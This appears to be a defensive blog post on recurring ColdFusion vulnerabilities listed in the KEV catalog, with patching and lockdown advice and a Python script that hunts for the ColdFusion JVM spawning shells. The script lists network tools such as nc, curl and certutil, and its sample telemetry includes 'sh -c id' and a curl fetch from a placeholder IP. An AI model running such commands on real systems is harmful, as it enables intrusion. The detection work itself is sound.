Adobe ColdFusion has been getting popped the same ways for 15 years
The KEV catalog holds a long run of ColdFusion bugs: deserialization RCEs, access-control bypasses, and file uploads, from 2013 to 2024. Different CVEs, same handful of weaknesses. If you still run internet-facing ColdFusion, you're operating a perennial target.
Adobe ColdFusion is one of the most persistently exploited products in the Known Exploited Vulnerabilities catalog, and the striking thing is how little the bugs vary. Across more than a decade, the entries cluster into the same few weaknesses: insecure deserialization leading to remote code execution, access-control bypasses that unlock admin functionality, and unrestricted file uploads. The catalog spans CVE-2013-0625/0629/0631/0632 (the 2013 wave of auth bypass, traversal, and disclosure), CVE-2018-4939 and CVE-2018-15961 (deserialization and file-upload RCE used by nation-state actors), CVE-2017-3066 (deserialization), the 2023 run of CVE-2023-26359, CVE-2023-26360, CVE-2023-29298, CVE-2023-38205, CVE-2023-29300, and CVE-2023-38203, and CVE-2024-20767. Different years, same playbook.
The recurring weaknesses
ColdFusion’s exploitation history concentrates in three buckets, and recognizing them is more useful than tracking each CVE:
- Insecure deserialization. ColdFusion has repeatedly deserialized untrusted data (Java/WDDX) in ways that let an attacker instantiate objects and execute code; CVE-2017-3066, CVE-2018-4939, CVE-2023-26360, CVE-2023-26359, CVE-2023-29300, and CVE-2023-38203 are all instances. This is the same deserialization footgun seen across the catalog, in a product that keeps stepping on it.
- Access-control bypasses. Several bugs (CVE-2023-29298, CVE-2023-38205, the 2013 auth-bypass set, CVE-2024-20767) let attackers reach administrative endpoints or functionality they shouldn’t, often chained with a deserialization or file bug to reach RCE. CVE-2023-29298 chained with CVE-2023-26360 was a notable 2023 example.
- Unrestricted file upload / traversal. CVE-2018-15961 and the 2013 traversal bugs let attackers write web shells. It's the familiar upload-to-RCE pattern.
The 2023 cluster also illustrates the patch-bypass habit: CVE-2023-38203 followed CVE-2023-29300 as a way around the initial fix, the same “narrow patch invites a variant” dynamic seen elsewhere. ColdFusion’s deserialization bugs in particular have been a moving target, fixed and re-bypassed.
Why it keeps happening
ColdFusion is a mature application server with a large, legacy codebase and a long tail of installs, many internet-facing (it serves web applications) and many maintained by teams who inherited the app and don’t touch the platform. That’s the recipe for a perennial target: an exposed, complex, privileged web server with recurring weaknesses and an owner base that patches slowly. Each new ColdFusion CVE lands on a population that’s still catching up on the last one, and exploitation, by APTs, ransomware crews, and cryptominers, tends to follow disclosure within days.
What to do
- Patch ColdFusion promptly and stay on a supported version. Adobe ships security updates regularly; apply them on an emergency cadence, because the disclosure-to-exploitation window is short and the patch-bypass pattern means you need the latest fix, not just a fix.
- Apply Adobe’s lockdown guide. Adobe publishes a ColdFusion security/lockdown guide that hardens the server (restricting admin access, disabling unused features, tightening file permissions). Following it closes a lot of the access-control and upload surface.
- Get the ColdFusion Administrator off the internet. The admin interface should never be publicly reachable; restrict it to a management network. Many access-control bugs only matter because the admin endpoints are exposed.
- Run ColdFusion with least privilege, and isolate it. Don't run it as a high-privilege account, and segment it so a web shell on the ColdFusion box isn't a flat path to everything.
- Assume compromise on long-exposed, unpatched servers, and hunt for web shells, the ColdFusion/JVM process spawning shells, and unexpected outbound connections. Given the deserialization history, an exposed unpatched instance should be treated as breached.
- Consider whether you still need it. For some organizations, the most durable answer to a perennial-target platform is migrating the application off it.
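The hunt described above, as an added example that is not part of the original note: a small detector run over constructed JSON-lines process-creation events (the field names and sample paths are assumptions, not a real EDR schema) that flags a ColdFusion JVM spawning a shell or a download tool, while ignoring the same child under an unrelated Java parent.

```python
import json
import re
from typing import Optional

# Child images a ColdFusion JVM has no business launching during normal operation.
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}
NET_TOOLS = {"curl", "wget", "certutil.exe", "bitsadmin.exe", "nc", "ncat"}

# Constructed sample events (not real telemetry); paths and hostnames are made up.
SAMPLE_EVENTS = """
{"host":"cf-web-01","parent_image":"/opt/coldfusion2021/jre/bin/java","parent_cmdline":"java -Dcoldfusion.home=/opt/coldfusion2021/cfusion coldfusion.server.ColdFusionBootstrap","image":"/bin/sh","cmdline":"sh -c id"}
{"host":"cf-web-01","parent_image":"/opt/coldfusion2021/jre/bin/java","parent_cmdline":"java -Dcoldfusion.home=/opt/coldfusion2021/cfusion coldfusion.server.ColdFusionBootstrap","image":"/usr/bin/curl","cmdline":"curl -s http://198.51.100.7/x"}
{"host":"cf-web-01","parent_image":"/opt/coldfusion2021/jre/bin/java","parent_cmdline":"java -Dcoldfusion.home=/opt/coldfusion2021/cfusion coldfusion.server.ColdFusionBootstrap","image":"/usr/bin/convert","cmdline":"convert in.png out.jpg"}
{"host":"build-01","parent_image":"/usr/bin/java","parent_cmdline":"java -jar jenkins.war","image":"/bin/sh","cmdline":"sh -c make"}
"""


def basename(path: str) -> str:
    """Last path component, tolerating both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_coldfusion_jvm(parent_image: str, parent_cmdline: str) -> bool:
    """Heuristic: a java/coldfusion binary whose path or command line mentions ColdFusion."""
    name = basename(parent_image)
    haystack = (parent_image + " " + parent_cmdline).lower()
    return name in {"java", "java.exe", "coldfusion", "coldfusion.exe"} and "coldfusion" in haystack


def classify(event: dict) -> Optional[str]:
    """Return an alert label for one process-creation event, or None if nothing fired."""
    if not is_coldfusion_jvm(event.get("parent_image", ""), event.get("parent_cmdline", "")):
        return None
    child = basename(event.get("image", ""))
    if child in SHELLS:
        return "cf_jvm_spawned_shell"
    if child in NET_TOOLS:
        return "cf_jvm_spawned_net_tool"
    return None


def hunt(jsonl: str) -> list:
    """Run classify() over JSON-lines events and return (host, label) pairs that fired."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        label = classify(event)
        if label:
            hits.append((event.get("host", "?"), label))
    return hits


if __name__ == "__main__":
    for host, label in hunt(SAMPLE_EVENTS):
        print(f"{host}: {label}")
```

The Jenkins event on build-01 is deliberately left unflagged: the parent check is what keeps this from paging on every Java process that runs a build script.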
The reframe is to treat ColdFusion as a known-bad-luck platform and posture for it: assume more deserialization and access-control bugs are coming, keep it patched and locked down per Adobe’s guide, keep its admin interface off the internet, and isolate it. The catalog’s fifteen-year ColdFusion record isn’t a series of surprises; it’s a pattern, and the defensive answer is the same across the run. We track the ColdFusion entries as one ongoing story, because the bugs keep rhyming.